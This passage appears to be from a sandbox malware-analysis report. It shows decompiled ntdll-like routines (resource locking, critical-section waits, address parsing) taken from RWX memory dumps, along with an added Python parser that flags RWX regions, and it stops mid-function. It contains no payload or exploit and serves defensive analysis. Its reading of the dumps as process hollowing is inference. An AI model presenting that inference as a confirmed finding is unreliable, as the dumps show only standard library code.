                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 5b1b62256e480c2c7db7bdca9194cf4291a8927602e747d07e4e95a2d186f8b7
                                                • Instruction ID: 105d9aa03f87245ab0e8892fc956a019000c2707318366ac27a31d733239e887
                                                • Opcode Fuzzy Hash: 5b1b62256e480c2c7db7bdca9194cf4291a8927602e747d07e4e95a2d186f8b7
                                                • Instruction Fuzzy Hash: 8321E3729006299BDB20DE54CC51BEEBBBCBB50704F448452EC4AD3100EB70AE58CFE8
                                                Uniqueness

                                                Uniqueness Score: -1.00%
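
The Memory Dump Source entries above name the sandbox memory dumps this code was lifted from. The fields worth reading are the base address, the protection (0x40 is PAGE_EXECUTE_READWRITE) and the "Offset ... based on PE" suffix, which ties a region to an image base: here code at 0x02500000 belongs to a PE mapped at 0x024F0000 in RWX memory, which is what process hollowing or a manually mapped image leaves behind. The parser below is an added example and not part of the report or of Joe Sandbox; it assumes the six dotted fields of an sdmp name are process number, dump pass, sequence number, base address, protection and region type, and it uses the report bullets above as its input.

```python
# Added example (not from the report): parse Joe Sandbox memory-dump ("sdmp")
# names like the Source File / Associated entries above and flag RWX regions.
# ASSUMED field layout of an sdmp name (not documented on this page):
#   <process>.<dump>.<sequence>.<base address>.<protection>.<type>.sdmp
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows memory-protection constants (winnt.h).
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

SDMP_RE = re.compile(
    r"(?P<process>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<sequence>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.sdmp"
)
# One "Memory Dump Source" bullet; the Offset / based-on-PE suffix only appears on Source File lines.
LINE_RE = re.compile(
    r"(?:Source File|Associated):\s*(?P<name>\S+\.sdmp)"
    r"(?:,\s*Offset:\s*(?P<pe_base>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false))?"
)


@dataclass
class SdmpRegion:
    process: int
    dump: int
    sequence: int
    base: int
    protect: int
    kind: int
    pe_base: Optional[int] = None       # image base the sandbox tied this region to
    based_on_pe: Optional[bool] = None  # None when the line carried no such field

    @property
    def rwx(self) -> bool:
        """Writable and executable at once: the classic injected-code protection."""
        return bool(self.protect & EXEC_MASK) and bool(self.protect & WRITE_MASK)

    @property
    def offset_in_pe(self) -> Optional[int]:
        return None if self.pe_base is None else self.base - self.pe_base


def parse_sdmp(name: str) -> SdmpRegion:
    m = SDMP_RE.fullmatch(name)
    if not m:
        raise ValueError(f"not an sdmp name: {name}")
    return SdmpRegion(
        process=int(m["process"], 16), dump=int(m["dump"], 16), sequence=int(m["sequence"]),
        base=int(m["base"], 16), protect=int(m["protect"], 16), kind=int(m["kind"], 16),
    )


def parse_report_lines(lines: List[str]) -> List[SdmpRegion]:
    """Pull every sdmp reference out of report bullets; ignore lines that carry none."""
    regions: List[SdmpRegion] = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        region = parse_sdmp(m["name"])
        if m["pe_base"] is not None:
            region.pe_base = int(m["pe_base"], 16)
            region.based_on_pe = m["pe"] == "true"
        regions.append(region)
    return regions


def rwx_regions(regions: List[SdmpRegion]) -> List[SdmpRegion]:
    return [r for r in regions if r.rwx]


# The Memory Dump Source bullets from the report block above, copied as they appear.
REPORT_LINES = [
    "• Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true",
    "• Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp",
    "• Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp",
    "• Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp",
    "• Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp",
    "• Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp",
    "• Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp",
    "• Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp",
]

if __name__ == "__main__":
    for r in parse_report_lines(REPORT_LINES):
        print(f"proc {r.process} dump {r.dump} base {r.base:#010x} protect {r.protect:#04x} "
              f"rwx={r.rwx} offset_in_pe={r.offset_in_pe}")
```

Run against the bullets above, every region is RWX in process 7, dump pass 2, and the Source File region sits 0x10000 past the PE base, with the first Associated region at the PE base itself (the header page of the mapped image). Those two facts together are the check to make when deciding whether a decompiled function came from an injected image rather than from a normally loaded module.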

                                                C-Code - Quality: 44%
                                                			/* Matches ntdll!RtlAcquireResourceExclusive: the same "RTL: Acquire Exclusive Sem Timeout ..." debug
                                                			   strings and RTL_RESOURCE field offsets (+0x20 ExclusiveSemaphore, +0x24 NumberOfWaitingExclusive,
                                                			   +0x28 NumberOfActive, +0x2c ExclusiveOwnerThread, +0x30 Flags, +0x34 DebugInfo). Finding it in the
                                                			   dumped 0x024F0000 image means that region holds ntdll code at a non-standard base, not sample-specific logic. */
                                                			E025353A5(signed int _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t32;
                                                				signed int _t37;
                                                				signed int _t40;
                                                				signed int _t42;
                                                				void* _t45;
                                                				intOrPtr _t46;
                                                				signed int _t49;
                                                				void* _t51;
                                                				signed int _t57;
                                                				signed int _t64;
                                                				signed int _t71;
                                                				void* _t74;
                                                				intOrPtr _t78;
                                                				signed int* _t79;
                                                				void* _t85;
                                                				signed int _t86;
                                                				signed int _t92;
                                                				void* _t104;
                                                				void* _t105;
                                                
                                                				_t64 = _a4;
                                                				_t32 =  *(_t64 + 0x28);
                                                				_t71 = _t64 + 0x28;
                                                				_push(_t92);
                                                				if(_t32 < 0) {
                                                					_t78 =  *[fs:0x18]; /* TEB; TEB+0x24 is ClientId.UniqueThread */
                                                					/* owner re-entering its own resource: bump NumberOfActive and return without waiting */
                                                					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                						goto L3;
                                                					} else {
                                                						__eflags = _t32 | 0xffffffff;
                                                						asm("lock xadd [ecx], eax");
                                                						return 1;
                                                					}
                                                				} else {
                                                					L3:
                                                					_push(_t86);
                                                					while(1) {
                                                						L4:
                                                						__eflags = _t32;
                                                						if(_t32 == 0) {
                                                							break;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                							_t79 = _t64 + 0x24;
                                                							_t71 = 1;
                                                							asm("lock xadd [eax], ecx");
                                                							_t32 =  *(_t64 + 0x28);
                                                							_a4 = _t32;
                                                							__eflags = _t32;
                                                							if(_t32 != 0) {
                                                								L19:
                                                								_t86 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                									asm("sbb esi, esi");
                                                									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x025f01c0; /* Flags bit 0 selects a NULL timeout, otherwise the LARGE_INTEGER at 0x025f01c0 */
                                                									_push(_t92);
                                                									_push(0);
                                                									_t37 = E0250F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                									__eflags = _t37 - 0x102;
                                                									if(_t37 != 0x102) {
                                                										break;
                                                									}
                                                									_t71 =  *(_t92 + 4);
                                                									_t85 =  *_t92;
                                                									_t51 = E02554FC0(_t85, _t71, 0xff676980, 0xffffffff); /* 64-bit divide of the 100-ns relative timeout by -10,000,000: seconds for the %I64u message */
                                                									_push(_t85);
                                                									_push(_t51);
                                                									E02563F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                									E02563F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                									_t86 = _t86 + 1;
                                                									_t105 = _t104 + 0x28;
                                                									__eflags = _t86 - 2;
                                                									if(__eflags > 0) {
                                                										E0259217A(_t71, __eflags, _t64);
                                                									}
                                                									_push("RTL: Re-Waiting\n");
                                                									_push(0);
                                                									_push(0x65);
                                                									E02563F92();
                                                									_t104 = _t105 + 0xc;
                                                								}
                                                								__eflags = _t37;
                                                								if(__eflags < 0) {
                                                									_push(_t37);
                                                									E02553915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                									asm("int3");
                                                									_t40 =  *_t71;
                                                									 *_t71 = 0;
                                                									__eflags = _t40;
                                                									if(_t40 == 0) {
                                                										L1:
                                                										_t42 = E02535384(_t92 + 0x24);
                                                										if(_t42 != 0) {
                                                											goto L31;
                                                										} else {
                                                											goto L2;
                                                										}
                                                									} else {
                                                										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                										_push( &_a4);
                                                										_push(_t40);
                                                										_t49 = E0250F970( *((intOrPtr*)(_t92 + 0x18)));
                                                										__eflags = _t49;
                                                										if(__eflags >= 0) {
                                                											goto L1;
                                                										} else {
                                                											_push(_t49);
                                                											E02553915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                											L31:
                                                											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                											_push( &_a4);
                                                											_push(1);
                                                											_t42 = E0250F970( *((intOrPtr*)(_t92 + 0x20)));
                                                											__eflags = _t42;
                                                											if(__eflags >= 0) {
                                                												L2:
                                                												return _t42;
                                                											} else {
                                                												_push(_t42);
                                                												E02553915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                												_push( &_a4);
                                                												_push(1);
                                                												_t42 = E0250F970( *((intOrPtr*)(_t92 + 0x20)));
                                                												__eflags = _t42;
                                                												if(__eflags >= 0) {
                                                													goto L2;
                                                												} else {
                                                													_push(_t42);
                                                													_t45 = E02553915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                													asm("int3");
                                                													while(1) {
                                                														_t74 = _t45;
                                                														__eflags = _t45 - 1;
                                                														if(_t45 != 1) {
                                                															break;
                                                														}
                                                														_t86 = _t86 | 0xffffffff;
                                                														_t45 = _t74;
                                                														asm("lock cmpxchg [ebx], edi");
                                                														__eflags = _t45 - _t74;
                                                														if(_t45 != _t74) {
                                                															continue;
                                                														} else {
                                                															_t46 =  *[fs:0x18];
                                                															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                															return _t46;
                                                														}
                                                														goto L37;
                                                													}
                                                													E02535329(_t74, _t92);
                                                													_push(1);
                                                													return E025353A5(_t92);
                                                												}
                                                											}
                                                										}
                                                									}
                                                								} else {
                                                									_t32 =  *(_t64 + 0x28);
                                                									continue;
                                                								}
                                                							} else {
                                                								_t71 =  *_t79;
                                                								__eflags = _t71;
                                                								if(__eflags > 0) {
                                                									while(1) {
                                                										_t57 = _t71;
                                                										asm("lock cmpxchg [edi], esi");
                                                										__eflags = _t57 - _t71;
                                                										if(_t57 == _t71) {
                                                											break;
                                                										}
                                                										_t71 = _t57;
                                                										__eflags = _t57;
                                                										if(_t57 > 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									}
                                                									_t32 = _a4;
                                                									__eflags = _t71;
                                                								}
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									goto L19;
                                                								}
                                                							}
                                                						}
                                                						goto L37;
                                                					}
                                                					_t71 = _t71 | 0xffffffff;
                                                					_t32 = 0;
                                                					asm("lock cmpxchg [edx], ecx");
                                                					__eflags = 0;
                                                					if(0 != 0) {
                                                						goto L4;
                                                					} else {
                                                						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                						return 1;
                                                					}
                                                				}
                                                				L37:
                                                			}

                                                Instruction addresses for the decompiled lines above (one per source line in the original two-column layout; 0x00000000 marks lines without an address):
                                                0x025353ab 0x025353ae 0x025353b1 0x025353b4 0x025353b7 0x025505b6 0x025505c0 0x025505c3 0x00000000 0x025505c9
                                                0x025505c9 0x025505cc 0x025505d5 0x025505d5 0x025353bd 0x025353bd 0x025353bd 0x025353be 0x025353be 0x025353be
                                                0x025353c0 0x00000000 0x00000000 0x02572269 0x0257226d 0x02572349 0x0257234d 0x02572273 0x02572276 0x02572279
                                                0x0257227e 0x02572283 0x02572287 0x0257228a 0x0257228d 0x0257228f 0x025722bc 0x025722bc 0x025722bc 0x025722be
                                                0x025722c4 0x025722cc 0x025722d0 0x025722d6 0x025722d7 0x025722da 0x025722df 0x025722e4 0x00000000 0x00000000
                                                0x025722e6 0x025722e9 0x025722f4 0x025722f9 0x025722fa 0x02572305 0x02572314 0x02572319 0x0257231a 0x0257231d
                                                0x02572320 0x02572323 0x02572323 0x02572328 0x0257232d 0x0257232f 0x02572331 0x02572336 0x02572336 0x0257233b
                                                0x0257233d 0x02572350 0x02572351 0x02572356 0x02572359 0x02572359 0x0257235b 0x0257235d 0x02535367 0x0253536b
                                                0x02535372 0x00000000 0x00000000 0x00000000 0x00000000 0x02572363 0x02572363 0x02572369 0x0257236a 0x0257236c
                                                0x02572371 0x02572373 0x00000000 0x02572379 0x02572379 0x0257237a 0x0257237f 0x0257237f 0x02572385 0x02572386
                                                0x02572389 0x0257238e 0x02572390 0x02535378 0x0253537c 0x02572396 0x02572396 0x02572397 0x0257239c 0x025723a2
                                                0x025723a3 0x025723a6 0x025723ab 0x025723ad 0x00000000 0x025723b3 0x025723b3 0x025723b4 0x025723b9 0x025723ba
                                                0x025723ba 0x025723bc 0x025723bf 0x00000000 0x00000000 0x02569153 0x02569158 0x0256915a 0x0256915e 0x02569160
                                                0x00000000 0x02569166 0x02569166 0x02569171 0x02569176 0x02569176 0x00000000 0x02569160 0x025723c6 0x025723cb
                                                0x025723d7 0x025723d7 0x025723ad 0x02572390 0x02572373 0x0257233f 0x0257233f 0x00000000 0x0257233f 0x02572291
                                                0x02572291 0x02572293 0x02572295 0x0257229a 0x025722a1 0x025722a3 0x025722a7 0x025722a9 0x00000000 0x00000000
                                                0x025722ab 0x025722ad 0x025722af 0x00000000 0x00000000 0x00000000 0x025722af 0x025722b1 0x025722b4 0x025722b4
                                                0x025722b6 0x00000000 0x00000000 0x00000000 0x00000000 0x025722b6 0x0257228f 0x00000000 0x0257226d 0x025353cb
                                                0x025353ce 0x025353d0 0x025353d4 0x025353d6 0x00000000 0x025353d8 0x025353e3 0x025353ea 0x025353ea 0x025353d6
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025722F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025722FC
                                                • RTL: Re-Waiting, xrefs: 02572328
                                                • RTL: Resource at %p, xrefs: 0257230B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: 2c5d2349285a422199f6480d280fb8448a06db79adad6e7b3439b19561a74b43
                                                • Instruction ID: 2fa7b96e9702361ea16e6644d9a483250c22e397bc2ad2577310c6e07f8aef60
                                                • Opcode Fuzzy Hash: 2c5d2349285a422199f6480d280fb8448a06db79adad6e7b3439b19561a74b43
                                                • Instruction Fuzzy Hash: 5C5128716503166BEB119F28DC80FA677A9FF88324F105619FD09DB280FB71E8418B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E0253EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				signed int _v24;
                                                				intOrPtr* _v28;
                                                				intOrPtr _v32;
                                                				signed int _v36;
                                                				intOrPtr _v40;
                                                				short _v66;
                                                				char _v72;
                                                				void* __esi;
                                                				intOrPtr _t38;
                                                				intOrPtr _t39;
                                                				signed int _t40;
                                                				intOrPtr _t42;
                                                				intOrPtr _t43;
                                                				signed int _t44;
                                                				void* _t46;
                                                				intOrPtr _t48;
                                                				signed int _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t53;
                                                				signed char _t67;
                                                				void* _t72;
                                                				intOrPtr _t77;
                                                				intOrPtr* _t80;
                                                				intOrPtr _t84;
                                                				intOrPtr* _t85;
                                                				void* _t91;
                                                				void* _t92;
                                                				void* _t93;
                                                
                                                				_t80 = __edi;
                                                				_t75 = __edx;
                                                				_t70 = __ecx;
                                                				_t84 = _a4;
                                                				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                					E0252DA92(__ecx, __edx, __eflags, _t84);
                                                					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                				}
                                                				_push(0);
                                                				__eflags = _t38 - 0xffffffff;
                                                				if(_t38 == 0xffffffff) {
                                                					_t39 =  *0x25f793c; // 0x0
                                                					_push(0);
                                                					_push(_t84);
                                                					_t40 = E025116C0(_t39);
                                                				} else {
                                                					_t40 = E0250F9D4(_t38);
                                                				}
                                                				_pop(_t85);
                                                				__eflags = _t40;
                                                				if(__eflags < 0) {
                                                					_push(_t40);
                                                					E02553915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                					asm("int3");
                                                					while(1) {
                                                						L21:
                                                						_t76 =  *[fs:0x18];
                                                						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                							_v66 = 0x1722;
                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_t76 =  &_v72;
                                                							_push( &_v72);
                                                							_v28 = _t85;
                                                							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_push(0x10);
                                                							_push(0x20402);
                                                							E025101A4( *0x7ffe0382 & 0x000000ff);
                                                						}
                                                						while(1) {
                                                							_t43 = _v8;
                                                							_push(_t80);
                                                							_push(0);
                                                							__eflags = _t43 - 0xffffffff;
                                                							if(_t43 == 0xffffffff) {
                                                								_t71 =  *0x25f793c; // 0x0
                                                								_push(_t85);
                                                								_t44 = E02511F28(_t71);
                                                							} else {
                                                								_t44 = E0250F8CC(_t43);
                                                							}
                                                							__eflags = _t44 - 0x102;
                                                							if(_t44 != 0x102) {
                                                								__eflags = _t44;
                                                								if(__eflags < 0) {
                                                									_push(_t44);
                                                									E02553915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                									asm("int3");
                                                									E02592306(_t85);
                                                									__eflags = _t67 & 0x00000002;
                                                									if((_t67 & 0x00000002) != 0) {
                                                										_t7 = _t67 + 2; // 0x4
                                                										_t72 = _t7;
                                                										asm("lock cmpxchg [edi], ecx");
                                                										__eflags = _t67 - _t67;
                                                										if(_t67 == _t67) {
                                                											E0253EC56(_t72, _t76, _t80, _t85);
                                                										}
                                                									}
                                                									return 0;
                                                								} else {
                                                									__eflags = _v24;
                                                									if(_v24 != 0) {
                                                										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                									}
                                                									return 2;
                                                								}
                                                								goto L36;
                                                							}
                                                							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                							_push(_t67);
                                                							_t46 = E02554FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                							_push(_t77);
                                                							E02563F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                							_t48 =  *_t85;
                                                							_t92 = _t91 + 0x18;
                                                							__eflags = _t48 - 0xffffffff;
                                                							if(_t48 == 0xffffffff) {
                                                								_t49 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                							}
                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_push(_t49);
                                                							_t50 = _v12;
                                                							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                							_push(_t85);
                                                							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                							E02563F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                							_t53 =  *_t85;
                                                							_t93 = _t92 + 0x20;
                                                							_t67 = _t67 + 1;
                                                							__eflags = _t53 - 0xffffffff;
                                                							if(_t53 != 0xffffffff) {
                                                								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                							}
                                                							__eflags = _t67 - 2;
                                                							if(_t67 > 2) {
                                                								__eflags = _t85 - 0x25f20c0;
                                                								if(_t85 != 0x25f20c0) {
                                                									_t76 = _a4;
                                                									__eflags = _a4 - _a8;
                                                									if(__eflags == 0) {
                                                										E0259217A(_t71, __eflags, _t85);
                                                									}
                                                								}
                                                							}
                                                							_push("RTL: Re-Waiting\n");
                                                							_push(0);
                                                							_push(0x65);
                                                							_a8 = _a4;
                                                							E02563F92();
                                                							_t91 = _t93 + 0xc;
                                                							__eflags =  *0x7ffe0382;
                                                							if( *0x7ffe0382 != 0) {
                                                								goto L21;
                                                							}
                                                						}
                                                						goto L36;
                                                					}
                                                				} else {
                                                					return _t40;
                                                				}
                                                				L36:
                                                			}

                                                Strings
                                                • RTL: Re-Waiting, xrefs: 025724FA
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0257248D
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025724BD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 151227c056d17b7ae220322a83ef86508b02f7b59dc6f30ed658ed17d456ba45
                                                • Instruction ID: e30f7f655876f79241006e7142eb2a828f4fb1a7c8cf599375675dab80898531
                                                • Opcode Fuzzy Hash: 151227c056d17b7ae220322a83ef86508b02f7b59dc6f30ed658ed17d456ba45
                                                • Instruction Fuzzy Hash: A941C7B0640205ABDB20DF64DC85FAA7BEAFF84720F108A55F955DB2C0D734E941CB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0254FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _t105;
                                                				void* _t110;
                                                				char _t114;
                                                				short _t115;
                                                				void* _t118;
                                                				signed short* _t119;
                                                				short _t120;
                                                				char _t122;
                                                				void* _t127;
                                                				void* _t130;
                                                				signed int _t136;
                                                				intOrPtr _t143;
                                                				signed int _t158;
                                                				signed short* _t164;
                                                				signed int _t167;
                                                				void* _t170;
                                                
                                                				_t158 = 0;
                                                				_t164 = _a4;
                                                				_v20 = 0;
                                                				_v24 = 0;
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_v16 = 0;
                                                				_v28 = 0;
                                                				_t136 = 0;
                                                				while(1) {
                                                					_t167 =  *_t164 & 0x0000ffff;
                                                					if(_t167 == _t158) {
                                                						break;
                                                					}
                                                					_t118 = _v20 - _t158;
                                                					if(_t118 == 0) {
                                                						if(_t167 == 0x3a) {
                                                							if(_v12 > _t158 || _v8 > _t158) {
                                                								break;
                                                							} else {
                                                								_t119 =  &(_t164[1]);
                                                								if( *_t119 != _t167) {
                                                									break;
                                                								}
                                                								_t143 = 2;
                                                								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                								_v28 = 1;
                                                								_v8 = _t143;
                                                								_t136 = _t136 + 1;
                                                								L47:
                                                								_t164 = _t119;
                                                								_v20 = _t143;
                                                								L14:
                                                								if(_v24 == _t158) {
                                                									L19:
                                                									_t164 =  &(_t164[1]);
                                                									_t158 = 0;
                                                									continue;
                                                								}
                                                								if(_v12 == _t158) {
                                                									if(_v16 > 4) {
                                                										L29:
                                                										return 0xc000000d;
                                                									}
                                                									_t120 = E0254EE02(_v24, _t158, 0x10);
                                                									_t170 = _t170 + 0xc;
                                                									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                									_t136 = _t136 + 1;
                                                									goto L19;
                                                								}
                                                								if(_v16 > 3) {
                                                									goto L29;
                                                								}
                                                								_t122 = E0254EE02(_v24, _t158, 0xa);
                                                								_t170 = _t170 + 0xc;
                                                								if(_t122 > 0xff) {
                                                									goto L29;
                                                								}
                                                								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                								goto L19;
                                                							}
                                                						}
                                                						L21:
                                                						if(_v8 > 7 || _t167 >= 0x80) {
                                                							break;
                                                						} else {
                                                							if(E0254685D(_t167, 4) == 0) {
                                                								if(E0254685D(_t167, 0x80) != 0) {
                                                									if(_v12 > 0) {
                                                										break;
                                                									}
                                                									_t127 = 1;
                                                									_a7 = 1;
                                                									_v24 = _t164;
                                                									_v20 = 1;
                                                									_v16 = 1;
                                                									L36:
                                                									if(_v20 == _t127) {
                                                										goto L19;
                                                									}
                                                									_t158 = 0;
                                                									goto L14;
                                                								}
                                                								break;
                                                							}
                                                							_a7 = 0;
                                                							_v24 = _t164;
                                                							_v20 = 1;
                                                							_v16 = 1;
                                                							goto L19;
                                                						}
                                                					}
                                                					_t130 = _t118 - 1;
                                                					if(_t130 != 0) {
                                                						if(_t130 == 1) {
                                                							goto L21;
                                                						}
                                                						_t127 = 1;
                                                						goto L36;
                                                					}
                                                					if(_t167 >= 0x80) {
                                                						L7:
                                                						if(_t167 == 0x3a) {
                                                							_t158 = 0;
                                                							if(_v12 > 0 || _v8 > 6) {
                                                								break;
                                                							} else {
                                                								_t119 =  &(_t164[1]);
                                                								if( *_t119 != _t167) {
                                                									_v8 = _v8 + 1;
                                                									L13:
                                                									_v20 = _t158;
                                                									goto L14;
                                                								}
                                                								if(_v28 != 0) {
                                                									break;
                                                								}
                                                								_v28 = _v8 + 1;
                                                								_t143 = 2;
                                                								_v8 = _v8 + _t143;
                                                								goto L47;
                                                							}
                                                						}
                                                						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                							break;
                                                						} else {
                                                							_v12 = _v12 + 1;
                                                							_t158 = 0;
                                                							goto L13;
                                                						}
                                                					}
                                                					if(E0254685D(_t167, 4) != 0) {
                                                						_v16 = _v16 + 1;
                                                						goto L19;
                                                					}
                                                					if(E0254685D(_t167, 0x80) != 0) {
                                                						_v16 = _v16 + 1;
                                                						if(_v12 > 0) {
                                                							break;
                                                						}
                                                						_a7 = 1;
                                                						goto L19;
                                                					}
                                                					goto L7;
                                                				}
                                                				 *_a8 = _t164;
